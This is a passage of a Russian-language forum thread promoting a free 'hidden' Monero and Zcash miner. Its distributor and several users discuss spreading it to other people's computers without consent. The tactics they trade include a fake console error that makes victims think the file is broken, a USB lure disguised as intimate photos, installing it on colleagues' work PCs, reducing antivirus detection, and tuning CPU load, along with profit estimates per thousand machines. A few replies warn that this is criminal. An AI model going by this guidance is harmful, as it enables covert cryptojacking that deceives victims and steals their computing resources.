Pages:
Author

Topic: Бесплатный скрытый майнер Monero+Zcash - page 11. (Read 3388 times)

newbie
Activity: 1
Merit: 0
Видимо я совсем туплю, но раньше не имел с этим дела
В твоей сборке майнера лежат два файла: сам майнер и "system64dr.sys"(в который кошельки прописывать).
Если я создам из этих двух файлов SFX архив и побегу это раскидывать, будет ли всё корректно работать?

Проинструктируй, пожалуйста)
Честно говоря, я совсем новичок в этом, но очень интересно
newbie
Activity: 95
Merit: 0
При запуске выдаст псевдоошибку в консоли,  это нормально, майнер установился. так пользователь подумает что файл битый
newbie
Activity: 95
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Наверное на них должно приходить намайненное)) Если не приходит, значит вы майните не туда) Обращайтесь Grin
Так если я майнил минут 10 то даже минимальную выплату не намайнил, где посмотреть что идет от меня хэш на пул?
Если майните на дварфе, то смотрим тут http://dwarfpool.com/xmr/address?wallet=кошелёк
Про распространение через флешки. Туда просто записывается ИНТИМ_ФОТО_С_ДР.exe

Постараюсь почистить код, чтоб детект снизить.
newbie
Activity: 1
Merit: 0
К сожалению,с сегодняшнего дня аваст стал блочить майнер(( теперь даже скачать не дает и всё автоматом поудалял с компа
https://hkar.ru/SNsK
newbie
Activity: 3
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Наверное на них должно приходить намайненное)) Если не приходит, значит вы майните не туда) Обращайтесь Grin
Так если я майнил минут 10 то даже минимальную выплату не намайнил, где посмотреть что идет от меня хэш на пул?
newbie
Activity: 54
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Наверное на них должно приходить намайненное)) Если не приходит, значит вы майните не туда) Обращайтесь Grin
newbie
Activity: 3
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Я захожу на пул и пытаюсь посмотреть свой аккаунт по кошельку, а не находит.
И можно как то подробнее описать процесс распространения через флешку. Важный момент для меня.
newbie
Activity: 95
Merit: 0
Перезаписывать без пароля
newbie
Activity: 3
Merit: 0
что там по паролю?
newbie
Activity: 1
Merit: 0
какой пароль для перезаписи?
newbie
Activity: 1
Merit: 0
А пароль какой?
newbie
Activity: 95
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.
newbie
Activity: 95
Merit: 0
Тут уже был похожий майнер, на фотку ставился. А он по сети не заражает пк? к примеру которые в локалке находятся. И если из 100 ПК, только 20 с выходом в инет, есть ли возможность использовать ресурсы всех ПК, а не только тех , которые имеют доступ в инет?
Нет, с локалкой не работает и нужен интернет.
jr. member
Activity: 294
Merit: 3
Тут уже был похожий майнер, на фотку ставился. А он по сети не заражает пк? к примеру которые в локалке находятся. И если из 100 ПК, только 20 с выходом в инет, есть ли возможность использовать ресурсы всех ПК, а не только тех , которые имеют доступ в инет?
newbie
Activity: 95
Merit: 0
Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Смотрите, чтобы эти сволочи, не разозлились на вас и не поставили пару-тройку отметин на вашей голове Smiley Да и под статью УК такие действия очень даже вписываются. Неужели, чтобы заработать, нужно кого-то обманывать?  Grin

Какая статья и состав преступления? Интересно представить как вася иванов идёт в отделение и пишет заявление, что на его компьютере какая-то программа работает и забирает много ресурсов))
member
Activity: 644
Merit: 51
Бугага, а потом в час Х туда подгружается ПЕТЯ и горемайнер идет вешаться
member
Activity: 364
Merit: 58
Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Смотрите, чтобы эти сволочи, не разозлились на вас и не поставили пару-тройку отметин на вашей голове Smiley Да и под статью УК такие действия очень даже вписываются. Неужели, чтобы заработать, нужно кого-то обманывать?  Grin
newbie
Activity: 95
Merit: 0
На на флешку он как бы записывает архив "интимные фото" и вот когда кто-то уже на своём компе захочет посмотреть их, майнер установится.
Ну с 1000 компов - это грубо 3000$ в месяц при круглосуточном майнинге, но 1000 набрать не просто.
newbie
Activity: 392
Merit: 0
Установив его на комп, он будет заражать всех, кто подключал туда флешку, правильно я понял? И сколько приносят примерно 1000 машин?
newbie
Activity: 95
Merit: 0
Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Да, правильно Вы понимаете. И не только на работу его надо отнести, но и распространить всюду, куда дотянутся Ваши руки. Чем больше чужих компов будет майнить для Вас, тем больше денюжек они Вам заработают.
ну может кто откроется о результативности такой деятельности.все-таки 50% нагрузка на упаковке,в проектной организации будет заметна.особенно,когда идет работа

А сколько там компов?
Нагрузка расчитывается по количеству ядер. 50% это 2 ядра из 4
Могу сделать 25%
Pages:
Jump to: